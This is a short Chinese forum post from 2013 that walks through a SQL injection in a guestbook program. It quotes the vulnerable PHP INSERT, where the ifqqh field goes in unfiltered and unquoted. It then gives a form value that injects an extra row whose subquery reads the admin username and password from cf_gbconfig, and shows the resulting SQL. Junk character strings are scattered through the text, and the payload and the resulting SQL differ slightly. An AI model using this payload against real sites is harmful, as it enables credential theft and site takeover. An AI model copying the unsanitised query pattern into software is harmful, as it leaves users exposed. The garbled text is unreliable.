留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。% [8 _, l' w& w/ h
- w6 S; t9 q# O3 @9 `) T& C3 u
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。5 T. f3 @$ y* `2 w# @: A9 |" U
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响; p! y8 p6 |5 D3 p
( `1 g! S$ b+ w4 O
提交的时候把ifqqh的值改一下。变成9 P2 a$ [9 R3 w: ?8 {
( E( s9 i- e, X, G @9 _2 @( L7 D
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
/ t0 [! T/ }, }" |3 Z1 |- `1 G1 r9 e9 ?
这样SQL插入语句就变了.' N1 T! t6 b1 A6 q
]; b# I2 @' a% Ninsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
( M8 r* r5 a2 h7 g) S
, Z. S2 L" w* `+ g* e构造了另外一句SQL。并且把帐号密码读出来。
5 o) @( E6 d; z& N+ F& H2 _8 Z
( {. Y) T* z8 F7 L& V) B |
发表于 2013-2-19 08:10:11
收藏
支持
反对